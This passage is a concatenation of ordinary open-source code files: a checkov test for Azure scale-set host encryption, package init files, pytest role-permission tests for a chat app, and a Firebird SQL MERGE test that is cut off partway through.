publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure3(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure4(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = false
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success1(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = true
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success2(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = true
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
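
The six test cases above all exercise one rule: the scale set passes only when `encryption_at_host_enabled` is explicitly `true`, and both a missing attribute and an explicit `false` fail. A minimal self-contained sketch of that rule (a hypothetical stand-in for the real check, assuming checkov's HCL parser wraps each attribute value in a one-element list, as the `hcl_res['resource'][0][...]` indexing above suggests):

```python
from enum import Enum


class CheckResult(Enum):
    PASSED = 'PASSED'
    FAILED = 'FAILED'


def scan_encryption_at_host(conf):
    """Pass only when encryption_at_host_enabled is explicitly true.

    `conf` mimics the dict produced by hcl2.loads, where every attribute
    value arrives wrapped in a one-element list (e.g. [True]).
    """
    value = conf.get('encryption_at_host_enabled', [False])
    return CheckResult.PASSED if value == [True] else CheckResult.FAILED


# Missing, false, and true attributes mirror the failure/success tests above.
assert scan_encryption_at_host({}) == CheckResult.FAILED
assert scan_encryption_at_host({'encryption_at_host_enabled': [False]}) == CheckResult.FAILED
assert scan_encryption_at_host({'encryption_at_host_enabled': [True]}) == CheckResult.PASSED
```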

# pysst/steps/__init__.py (from mjgorman/pysst, MIT)
from pysst.steps.shared_steps import *
from pysst.steps.nmap_steps import *
from pysst.steps.requests_steps import *

# tests/app/main/roles/test_roles.py (from awtrimpe/socks-chat, MIT)
import pytest
from app.main.database.tables import Permission, UserPermission
from app.main.roles import change_user_permission, set_user_permission
from app.main.users import register_user
def describe_set_user_permission():
def test_set_user_permission(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
perm = set_user_permission(session, 'admin', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert user_perm.permission_id == admin_perm.id
def test_set_user_permission_first_user(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
# First user must be the admin
perm = set_user_permission(session, 'user', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert user_perm.permission_id == admin_perm.id
def test_set_user_permission_multiple_users(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
perm = set_user_permission(session, 'admin', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert admin_perm.id == user_perm.permission_id
new_user_2 = register_user(
session, 'anheuserbusch', 'DillyDilly', 'Bud', 'Light')
session.add(new_user_2)
session.commit()
perm_2 = set_user_permission(session, 'user', new_user_2.id)
session.add(perm_2)
session.commit()
user_permission = session.query(
Permission).filter_by(name='user').first()
user2_perm = session.query(UserPermission).filter_by(
user_id=new_user_2.id).first()
assert user_permission.id == user2_perm.permission_id
def describe_change_user_permission():

    def test_change_second_user(session, client):
        with session() as session:
            new_user_1 = register_user(
                session, 'sabmiller', 'ColdAsTheRockies', 'Coors', 'Light')
            session.add(new_user_1)
            session.commit()
            perm = set_user_permission(session, 'admin', new_user_1.id)
            session.add(perm)
            session.commit()
            new_user_2 = register_user(
                session, 'anheuserbusch', 'DillyDilly', 'Bud', 'Light')
            session.add(new_user_2)
            session.commit()
            perm_2 = set_user_permission(session, 'user', new_user_2.id)
            session.add(perm_2)
            session.commit()
            user_permission = session.query(
                Permission).filter_by(name='user').first()
            admin_permission = session.query(
                Permission).filter_by(name='admin').first()
            user_perm_2 = session.query(UserPermission).filter_by(
                user_id=new_user_2.id).first()
            assert user_perm_2.permission_id == user_permission.id
            change_user_permission(session, new_user_2.id)
            session.commit()
            assert user_perm_2.permission_id == admin_permission.id
            change_user_permission(session, new_user_2.id)
            session.commit()
            assert user_perm_2.permission_id == user_permission.id

    def test_change_only_admin(session, client):
        with session() as session:
            user = register_user(
                session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
            session.add(user)
            session.commit()
            perm = set_user_permission(session, 'admin', user.id)
            session.add(perm)
            session.commit()
            with pytest.raises(Exception) as exc:
                change_user_permission(session, user.id)
            assert str(exc.value) == 'Cannot remove last admin'
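A detail worth noting in `test_change_only_admin`: the assertion on `exc.value` has to sit *outside* the `with pytest.raises(...)` block, because the raising call aborts the block and any statement after it inside the block would never run. A minimal self-contained sketch of the idiom, using a stand-in `change_user_permission` (hypothetical, for illustration only):

```python
import pytest


def change_user_permission(session, user_id):
    # Stand-in for the real helper: behaves as if user_id is the last admin.
    raise Exception('Cannot remove last admin')


def test_change_only_admin():
    with pytest.raises(Exception) as exc:
        change_user_permission(None, 1)
    # Outside the `with` block: here exc.value holds the captured exception.
    assert str(exc.value) == 'Cannot remove last admin'
```

`pytest.raises` fails the test if no exception is raised, so the pattern also guards against the helper silently succeeding.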
# snowfall/generator_syncers/__init__.py (repo: lowjiajin/snowfall, license: MIT)
from snowfall.generator_syncers.abstracts import BaseSyncer
from snowfall.generator_syncers.database_syncer import DatabaseSyncer
from snowfall.generator_syncers.simple_syncer import SimpleSyncer
# tests/bugs/core_3639_test.py (repo: reevespaul/firebird-qa, license: MIT)
#coding:utf-8
#
# id: bugs.core_3639
# title: Allow the use of multiple WHEN MATCHED / NOT MATCHED clauses in MERGE, as per the SQL 2008 specification
# decription:
# tracker_id: CORE-3639
# min_versions: ['3.0']
# versions: 3.0
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('=.*', '')]
init_script_1 = """
recreate table ta(id int primary key, x int, y int);
recreate table tb(id int primary key, x int, y int);
commit;
insert into ta(id, x, y) values(1, 100, 111);
insert into ta(id, x, y) values(2, 200, 222);
insert into ta(id, x, y) values(3, 300, 333);
insert into ta(id, x, y) values(4, 400, 444);
insert into ta(id, x, y) values(5, 500, 555);
insert into tb(id, x, y) values(1, 10, 11);
insert into tb(id, x, y) values(4, 40, 44);
insert into tb(id, x, y) values(5, 50, 55);
commit;
recreate table s(id int, x int);
commit;
insert into s(id, x) select row_number()over(), rand()*1000000 from rdb$types;
commit;
recreate table t(id int primary key, x int);
commit;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
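The 254 `when NOT matched` branches in `test_script_1` below were produced by the Windows batch script reproduced in its leading comments. An equivalent generator sketch in Python (the function name is mine, not part of the test suite):

```python
def make_merge_insert(n: int) -> str:
    """Build a MERGE statement with n 'when NOT matched' branches,
    mirroring the batch script embedded in test_script_1's comments."""
    lines = ["merge into t using s on s.id = t.id"]
    for i in range(1, n + 1):
        lines.append(
            f"when NOT matched and s.id = {i} then insert values(s.id, s.x)")
    lines.append(";")
    return "\n".join(lines)
```

Calling `make_merge_insert(254)` yields the same statement shape as the first MERGE in the script; the second MERGE (the `when matched ... update` variant) follows the same pattern with a different branch body.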
test_script_1 = """
-- 1. Check ability to compile MERGE with 254 trivial `when` expressions:
-- Batch for generating SQL with MERGE and arbitrary number of WHEN sections:
-- @echo off
-- set sql=%~n0.sql
-- del %sql% 2>nul
-- set n=254
-- echo recreate table s(id int, x int); commit;>>%sql%
-- echo insert into s(id, x) select row_number()over(), rand()*1000000 from rdb$types; commit;>>%sql%
-- echo recreate table t(id int primary key, x int); commit;>>%sql%
--
-- echo merge into t using s on s.id = t.id>>%sql%
-- for /l %%i in (1, 1, %n%) do (
-- echo when NOT matched and s.id = %%i then insert values(s.id, s.x^)>>%sql%
-- )
-- echo ;>>%sql%
--
--
-- echo merge into t using s on s.id = t.id>>%sql%
-- for /l %%i in (1, 1, %n%) do (
-- echo when matched and s.id = %%i then update set t.x = t.x + s.x>>%sql%
-- )
-- echo ;>>%sql%
--
-- echo rollback;>>%sql%
-- echo set count on;>>%sql%
-- echo select * from t;>>%sql%
--
-- isql localhost/3333:e30 -i %sql%
merge into t using s on s.id = t.id
when NOT matched and s.id = 1 then insert values(s.id, s.x)
when NOT matched and s.id = 2 then insert values(s.id, s.x)
when NOT matched and s.id = 3 then insert values(s.id, s.x)
when NOT matched and s.id = 4 then insert values(s.id, s.x)
when NOT matched and s.id = 5 then insert values(s.id, s.x)
when NOT matched and s.id = 6 then insert values(s.id, s.x)
when NOT matched and s.id = 7 then insert values(s.id, s.x)
when NOT matched and s.id = 8 then insert values(s.id, s.x)
when NOT matched and s.id = 9 then insert values(s.id, s.x)
when NOT matched and s.id = 10 then insert values(s.id, s.x)
when NOT matched and s.id = 11 then insert values(s.id, s.x)
when NOT matched and s.id = 12 then insert values(s.id, s.x)
when NOT matched and s.id = 13 then insert values(s.id, s.x)
when NOT matched and s.id = 14 then insert values(s.id, s.x)
when NOT matched and s.id = 15 then insert values(s.id, s.x)
when NOT matched and s.id = 16 then insert values(s.id, s.x)
when NOT matched and s.id = 17 then insert values(s.id, s.x)
when NOT matched and s.id = 18 then insert values(s.id, s.x)
when NOT matched and s.id = 19 then insert values(s.id, s.x)
when NOT matched and s.id = 20 then insert values(s.id, s.x)
when NOT matched and s.id = 21 then insert values(s.id, s.x)
when NOT matched and s.id = 22 then insert values(s.id, s.x)
when NOT matched and s.id = 23 then insert values(s.id, s.x)
when NOT matched and s.id = 24 then insert values(s.id, s.x)
when NOT matched and s.id = 25 then insert values(s.id, s.x)
when NOT matched and s.id = 26 then insert values(s.id, s.x)
when NOT matched and s.id = 27 then insert values(s.id, s.x)
when NOT matched and s.id = 28 then insert values(s.id, s.x)
when NOT matched and s.id = 29 then insert values(s.id, s.x)
when NOT matched and s.id = 30 then insert values(s.id, s.x)
when NOT matched and s.id = 31 then insert values(s.id, s.x)
when NOT matched and s.id = 32 then insert values(s.id, s.x)
when NOT matched and s.id = 33 then insert values(s.id, s.x)
when NOT matched and s.id = 34 then insert values(s.id, s.x)
when NOT matched and s.id = 35 then insert values(s.id, s.x)
when NOT matched and s.id = 36 then insert values(s.id, s.x)
when NOT matched and s.id = 37 then insert values(s.id, s.x)
when NOT matched and s.id = 38 then insert values(s.id, s.x)
when NOT matched and s.id = 39 then insert values(s.id, s.x)
when NOT matched and s.id = 40 then insert values(s.id, s.x)
when NOT matched and s.id = 41 then insert values(s.id, s.x)
when NOT matched and s.id = 42 then insert values(s.id, s.x)
when NOT matched and s.id = 43 then insert values(s.id, s.x)
when NOT matched and s.id = 44 then insert values(s.id, s.x)
when NOT matched and s.id = 45 then insert values(s.id, s.x)
when NOT matched and s.id = 46 then insert values(s.id, s.x)
when NOT matched and s.id = 47 then insert values(s.id, s.x)
when NOT matched and s.id = 48 then insert values(s.id, s.x)
when NOT matched and s.id = 49 then insert values(s.id, s.x)
when NOT matched and s.id = 50 then insert values(s.id, s.x)
when NOT matched and s.id = 51 then insert values(s.id, s.x)
when NOT matched and s.id = 52 then insert values(s.id, s.x)
when NOT matched and s.id = 53 then insert values(s.id, s.x)
when NOT matched and s.id = 54 then insert values(s.id, s.x)
when NOT matched and s.id = 55 then insert values(s.id, s.x)
when NOT matched and s.id = 56 then insert values(s.id, s.x)
when NOT matched and s.id = 57 then insert values(s.id, s.x)
when NOT matched and s.id = 58 then insert values(s.id, s.x)
when NOT matched and s.id = 59 then insert values(s.id, s.x)
when NOT matched and s.id = 60 then insert values(s.id, s.x)
when NOT matched and s.id = 61 then insert values(s.id, s.x)
when NOT matched and s.id = 62 then insert values(s.id, s.x)
when NOT matched and s.id = 63 then insert values(s.id, s.x)
when NOT matched and s.id = 64 then insert values(s.id, s.x)
when NOT matched and s.id = 65 then insert values(s.id, s.x)
when NOT matched and s.id = 66 then insert values(s.id, s.x)
when NOT matched and s.id = 67 then insert values(s.id, s.x)
when NOT matched and s.id = 68 then insert values(s.id, s.x)
when NOT matched and s.id = 69 then insert values(s.id, s.x)
when NOT matched and s.id = 70 then insert values(s.id, s.x)
when NOT matched and s.id = 71 then insert values(s.id, s.x)
when NOT matched and s.id = 72 then insert values(s.id, s.x)
when NOT matched and s.id = 73 then insert values(s.id, s.x)
when NOT matched and s.id = 74 then insert values(s.id, s.x)
when NOT matched and s.id = 75 then insert values(s.id, s.x)
when NOT matched and s.id = 76 then insert values(s.id, s.x)
when NOT matched and s.id = 77 then insert values(s.id, s.x)
when NOT matched and s.id = 78 then insert values(s.id, s.x)
when NOT matched and s.id = 79 then insert values(s.id, s.x)
when NOT matched and s.id = 80 then insert values(s.id, s.x)
when NOT matched and s.id = 81 then insert values(s.id, s.x)
when NOT matched and s.id = 82 then insert values(s.id, s.x)
when NOT matched and s.id = 83 then insert values(s.id, s.x)
when NOT matched and s.id = 84 then insert values(s.id, s.x)
when NOT matched and s.id = 85 then insert values(s.id, s.x)
when NOT matched and s.id = 86 then insert values(s.id, s.x)
when NOT matched and s.id = 87 then insert values(s.id, s.x)
when NOT matched and s.id = 88 then insert values(s.id, s.x)
when NOT matched and s.id = 89 then insert values(s.id, s.x)
when NOT matched and s.id = 90 then insert values(s.id, s.x)
when NOT matched and s.id = 91 then insert values(s.id, s.x)
when NOT matched and s.id = 92 then insert values(s.id, s.x)
when NOT matched and s.id = 93 then insert values(s.id, s.x)
when NOT matched and s.id = 94 then insert values(s.id, s.x)
when NOT matched and s.id = 95 then insert values(s.id, s.x)
when NOT matched and s.id = 96 then insert values(s.id, s.x)
when NOT matched and s.id = 97 then insert values(s.id, s.x)
when NOT matched and s.id = 98 then insert values(s.id, s.x)
when NOT matched and s.id = 99 then insert values(s.id, s.x)
when NOT matched and s.id = 100 then insert values(s.id, s.x)
when NOT matched and s.id = 101 then insert values(s.id, s.x)
when NOT matched and s.id = 102 then insert values(s.id, s.x)
when NOT matched and s.id = 103 then insert values(s.id, s.x)
when NOT matched and s.id = 104 then insert values(s.id, s.x)
when NOT matched and s.id = 105 then insert values(s.id, s.x)
when NOT matched and s.id = 106 then insert values(s.id, s.x)
when NOT matched and s.id = 107 then insert values(s.id, s.x)
when NOT matched and s.id = 108 then insert values(s.id, s.x)
when NOT matched and s.id = 109 then insert values(s.id, s.x)
when NOT matched and s.id = 110 then insert values(s.id, s.x)
when NOT matched and s.id = 111 then insert values(s.id, s.x)
when NOT matched and s.id = 112 then insert values(s.id, s.x)
when NOT matched and s.id = 113 then insert values(s.id, s.x)
when NOT matched and s.id = 114 then insert values(s.id, s.x)
when NOT matched and s.id = 115 then insert values(s.id, s.x)
when NOT matched and s.id = 116 then insert values(s.id, s.x)
when NOT matched and s.id = 117 then insert values(s.id, s.x)
when NOT matched and s.id = 118 then insert values(s.id, s.x)
when NOT matched and s.id = 119 then insert values(s.id, s.x)
when NOT matched and s.id = 120 then insert values(s.id, s.x)
when NOT matched and s.id = 121 then insert values(s.id, s.x)
when NOT matched and s.id = 122 then insert values(s.id, s.x)
when NOT matched and s.id = 123 then insert values(s.id, s.x)
when NOT matched and s.id = 124 then insert values(s.id, s.x)
when NOT matched and s.id = 125 then insert values(s.id, s.x)
when NOT matched and s.id = 126 then insert values(s.id, s.x)
when NOT matched and s.id = 127 then insert values(s.id, s.x)
when NOT matched and s.id = 128 then insert values(s.id, s.x)
when NOT matched and s.id = 129 then insert values(s.id, s.x)
when NOT matched and s.id = 130 then insert values(s.id, s.x)
when NOT matched and s.id = 131 then insert values(s.id, s.x)
when NOT matched and s.id = 132 then insert values(s.id, s.x)
when NOT matched and s.id = 133 then insert values(s.id, s.x)
when NOT matched and s.id = 134 then insert values(s.id, s.x)
when NOT matched and s.id = 135 then insert values(s.id, s.x)
when NOT matched and s.id = 136 then insert values(s.id, s.x)
when NOT matched and s.id = 137 then insert values(s.id, s.x)
when NOT matched and s.id = 138 then insert values(s.id, s.x)
when NOT matched and s.id = 139 then insert values(s.id, s.x)
when NOT matched and s.id = 140 then insert values(s.id, s.x)
when NOT matched and s.id = 141 then insert values(s.id, s.x)
when NOT matched and s.id = 142 then insert values(s.id, s.x)
when NOT matched and s.id = 143 then insert values(s.id, s.x)
when NOT matched and s.id = 144 then insert values(s.id, s.x)
when NOT matched and s.id = 145 then insert values(s.id, s.x)
when NOT matched and s.id = 146 then insert values(s.id, s.x)
when NOT matched and s.id = 147 then insert values(s.id, s.x)
when NOT matched and s.id = 148 then insert values(s.id, s.x)
when NOT matched and s.id = 149 then insert values(s.id, s.x)
when NOT matched and s.id = 150 then insert values(s.id, s.x)
when NOT matched and s.id = 151 then insert values(s.id, s.x)
when NOT matched and s.id = 152 then insert values(s.id, s.x)
when NOT matched and s.id = 153 then insert values(s.id, s.x)
when NOT matched and s.id = 154 then insert values(s.id, s.x)
when NOT matched and s.id = 155 then insert values(s.id, s.x)
when NOT matched and s.id = 156 then insert values(s.id, s.x)
when NOT matched and s.id = 157 then insert values(s.id, s.x)
when NOT matched and s.id = 158 then insert values(s.id, s.x)
when NOT matched and s.id = 159 then insert values(s.id, s.x)
when NOT matched and s.id = 160 then insert values(s.id, s.x)
when NOT matched and s.id = 161 then insert values(s.id, s.x)
when NOT matched and s.id = 162 then insert values(s.id, s.x)
when NOT matched and s.id = 163 then insert values(s.id, s.x)
when NOT matched and s.id = 164 then insert values(s.id, s.x)
when NOT matched and s.id = 165 then insert values(s.id, s.x)
when NOT matched and s.id = 166 then insert values(s.id, s.x)
when NOT matched and s.id = 167 then insert values(s.id, s.x)
when NOT matched and s.id = 168 then insert values(s.id, s.x)
when NOT matched and s.id = 169 then insert values(s.id, s.x)
when NOT matched and s.id = 170 then insert values(s.id, s.x)
when NOT matched and s.id = 171 then insert values(s.id, s.x)
when NOT matched and s.id = 172 then insert values(s.id, s.x)
when NOT matched and s.id = 173 then insert values(s.id, s.x)
when NOT matched and s.id = 174 then insert values(s.id, s.x)
when NOT matched and s.id = 175 then insert values(s.id, s.x)
when NOT matched and s.id = 176 then insert values(s.id, s.x)
when NOT matched and s.id = 177 then insert values(s.id, s.x)
when NOT matched and s.id = 178 then insert values(s.id, s.x)
when NOT matched and s.id = 179 then insert values(s.id, s.x)
when NOT matched and s.id = 180 then insert values(s.id, s.x)
when NOT matched and s.id = 181 then insert values(s.id, s.x)
when NOT matched and s.id = 182 then insert values(s.id, s.x)
when NOT matched and s.id = 183 then insert values(s.id, s.x)
when NOT matched and s.id = 184 then insert values(s.id, s.x)
when NOT matched and s.id = 185 then insert values(s.id, s.x)
when NOT matched and s.id = 186 then insert values(s.id, s.x)
when NOT matched and s.id = 187 then insert values(s.id, s.x)
when NOT matched and s.id = 188 then insert values(s.id, s.x)
when NOT matched and s.id = 189 then insert values(s.id, s.x)
when NOT matched and s.id = 190 then insert values(s.id, s.x)
when NOT matched and s.id = 191 then insert values(s.id, s.x)
when NOT matched and s.id = 192 then insert values(s.id, s.x)
when NOT matched and s.id = 193 then insert values(s.id, s.x)
when NOT matched and s.id = 194 then insert values(s.id, s.x)
when NOT matched and s.id = 195 then insert values(s.id, s.x)
when NOT matched and s.id = 196 then insert values(s.id, s.x)
when NOT matched and s.id = 197 then insert values(s.id, s.x)
when NOT matched and s.id = 198 then insert values(s.id, s.x)
when NOT matched and s.id = 199 then insert values(s.id, s.x)
when NOT matched and s.id = 200 then insert values(s.id, s.x)
when NOT matched and s.id = 201 then insert values(s.id, s.x)
when NOT matched and s.id = 202 then insert values(s.id, s.x)
when NOT matched and s.id = 203 then insert values(s.id, s.x)
when NOT matched and s.id = 204 then insert values(s.id, s.x)
when NOT matched and s.id = 205 then insert values(s.id, s.x)
when NOT matched and s.id = 206 then insert values(s.id, s.x)
when NOT matched and s.id = 207 then insert values(s.id, s.x)
when NOT matched and s.id = 208 then insert values(s.id, s.x)
when NOT matched and s.id = 209 then insert values(s.id, s.x)
when NOT matched and s.id = 210 then insert values(s.id, s.x)
when NOT matched and s.id = 211 then insert values(s.id, s.x)
when NOT matched and s.id = 212 then insert values(s.id, s.x)
when NOT matched and s.id = 213 then insert values(s.id, s.x)
when NOT matched and s.id = 214 then insert values(s.id, s.x)
when NOT matched and s.id = 215 then insert values(s.id, s.x)
when NOT matched and s.id = 216 then insert values(s.id, s.x)
when NOT matched and s.id = 217 then insert values(s.id, s.x)
when NOT matched and s.id = 218 then insert values(s.id, s.x)
when NOT matched and s.id = 219 then insert values(s.id, s.x)
when NOT matched and s.id = 220 then insert values(s.id, s.x)
when NOT matched and s.id = 221 then insert values(s.id, s.x)
when NOT matched and s.id = 222 then insert values(s.id, s.x)
when NOT matched and s.id = 223 then insert values(s.id, s.x)
when NOT matched and s.id = 224 then insert values(s.id, s.x)
when NOT matched and s.id = 225 then insert values(s.id, s.x)
when NOT matched and s.id = 226 then insert values(s.id, s.x)
when NOT matched and s.id = 227 then insert values(s.id, s.x)
when NOT matched and s.id = 228 then insert values(s.id, s.x)
when NOT matched and s.id = 229 then insert values(s.id, s.x)
when NOT matched and s.id = 230 then insert values(s.id, s.x)
when NOT matched and s.id = 231 then insert values(s.id, s.x)
when NOT matched and s.id = 232 then insert values(s.id, s.x)
when NOT matched and s.id = 233 then insert values(s.id, s.x)
when NOT matched and s.id = 234 then insert values(s.id, s.x)
when NOT matched and s.id = 235 then insert values(s.id, s.x)
when NOT matched and s.id = 236 then insert values(s.id, s.x)
when NOT matched and s.id = 237 then insert values(s.id, s.x)
when NOT matched and s.id = 238 then insert values(s.id, s.x)
when NOT matched and s.id = 239 then insert values(s.id, s.x)
when NOT matched and s.id = 240 then insert values(s.id, s.x)
when NOT matched and s.id = 241 then insert values(s.id, s.x)
when NOT matched and s.id = 242 then insert values(s.id, s.x)
when NOT matched and s.id = 243 then insert values(s.id, s.x)
when NOT matched and s.id = 244 then insert values(s.id, s.x)
when NOT matched and s.id = 245 then insert values(s.id, s.x)
when NOT matched and s.id = 246 then insert values(s.id, s.x)
when NOT matched and s.id = 247 then insert values(s.id, s.x)
when NOT matched and s.id = 248 then insert values(s.id, s.x)
when NOT matched and s.id = 249 then insert values(s.id, s.x)
when NOT matched and s.id = 250 then insert values(s.id, s.x)
when NOT matched and s.id = 251 then insert values(s.id, s.x)
when NOT matched and s.id = 252 then insert values(s.id, s.x)
when NOT matched and s.id = 253 then insert values(s.id, s.x)
when NOT matched and s.id = 254 then insert values(s.id, s.x)
;
merge into t using s on s.id = t.id
when matched and s.id = 1 then update set t.x = t.x + s.x
when matched and s.id = 2 then update set t.x = t.x + s.x
when matched and s.id = 3 then update set t.x = t.x + s.x
when matched and s.id = 4 then update set t.x = t.x + s.x
when matched and s.id = 5 then update set t.x = t.x + s.x
when matched and s.id = 6 then update set t.x = t.x + s.x
when matched and s.id = 7 then update set t.x = t.x + s.x
when matched and s.id = 8 then update set t.x = t.x + s.x
when matched and s.id = 9 then update set t.x = t.x + s.x
when matched and s.id = 10 then update set t.x = t.x + s.x
when matched and s.id = 11 then update set t.x = t.x + s.x
when matched and s.id = 12 then update set t.x = t.x + s.x
when matched and s.id = 13 then update set t.x = t.x + s.x
when matched and s.id = 14 then update set t.x = t.x + s.x
when matched and s.id = 15 then update set t.x = t.x + s.x
when matched and s.id = 16 then update set t.x = t.x + s.x
when matched and s.id = 17 then update set t.x = t.x + s.x
when matched and s.id = 18 then update set t.x = t.x + s.x
when matched and s.id = 19 then update set t.x = t.x + s.x
when matched and s.id = 20 then update set t.x = t.x + s.x
when matched and s.id = 21 then update set t.x = t.x + s.x
when matched and s.id = 22 then update set t.x = t.x + s.x
when matched and s.id = 23 then update set t.x = t.x + s.x
when matched and s.id = 24 then update set t.x = t.x + s.x
when matched and s.id = 25 then update set t.x = t.x + s.x
when matched and s.id = 26 then update set t.x = t.x + s.x
when matched and s.id = 27 then update set t.x = t.x + s.x
when matched and s.id = 28 then update set t.x = t.x + s.x
when matched and s.id = 29 then update set t.x = t.x + s.x
when matched and s.id = 30 then update set t.x = t.x + s.x
when matched and s.id = 31 then update set t.x = t.x + s.x
when matched and s.id = 32 then update set t.x = t.x + s.x
when matched and s.id = 33 then update set t.x = t.x + s.x
when matched and s.id = 34 then update set t.x = t.x + s.x
when matched and s.id = 35 then update set t.x = t.x + s.x
when matched and s.id = 36 then update set t.x = t.x + s.x
when matched and s.id = 37 then update set t.x = t.x + s.x
when matched and s.id = 38 then update set t.x = t.x + s.x
when matched and s.id = 39 then update set t.x = t.x + s.x
when matched and s.id = 40 then update set t.x = t.x + s.x
when matched and s.id = 41 then update set t.x = t.x + s.x
when matched and s.id = 42 then update set t.x = t.x + s.x
when matched and s.id = 43 then update set t.x = t.x + s.x
when matched and s.id = 44 then update set t.x = t.x + s.x
when matched and s.id = 45 then update set t.x = t.x + s.x
when matched and s.id = 46 then update set t.x = t.x + s.x
when matched and s.id = 47 then update set t.x = t.x + s.x
when matched and s.id = 48 then update set t.x = t.x + s.x
when matched and s.id = 49 then update set t.x = t.x + s.x
when matched and s.id = 50 then update set t.x = t.x + s.x
when matched and s.id = 51 then update set t.x = t.x + s.x
when matched and s.id = 52 then update set t.x = t.x + s.x
when matched and s.id = 53 then update set t.x = t.x + s.x
when matched and s.id = 54 then update set t.x = t.x + s.x
when matched and s.id = 55 then update set t.x = t.x + s.x
when matched and s.id = 56 then update set t.x = t.x + s.x
when matched and s.id = 57 then update set t.x = t.x + s.x
when matched and s.id = 58 then update set t.x = t.x + s.x
when matched and s.id = 59 then update set t.x = t.x + s.x
when matched and s.id = 60 then update set t.x = t.x + s.x
when matched and s.id = 61 then update set t.x = t.x + s.x
when matched and s.id = 62 then update set t.x = t.x + s.x
when matched and s.id = 63 then update set t.x = t.x + s.x
when matched and s.id = 64 then update set t.x = t.x + s.x
when matched and s.id = 65 then update set t.x = t.x + s.x
when matched and s.id = 66 then update set t.x = t.x + s.x
when matched and s.id = 67 then update set t.x = t.x + s.x
when matched and s.id = 68 then update set t.x = t.x + s.x
when matched and s.id = 69 then update set t.x = t.x + s.x
when matched and s.id = 70 then update set t.x = t.x + s.x
when matched and s.id = 71 then update set t.x = t.x + s.x
when matched and s.id = 72 then update set t.x = t.x + s.x
when matched and s.id = 73 then update set t.x = t.x + s.x
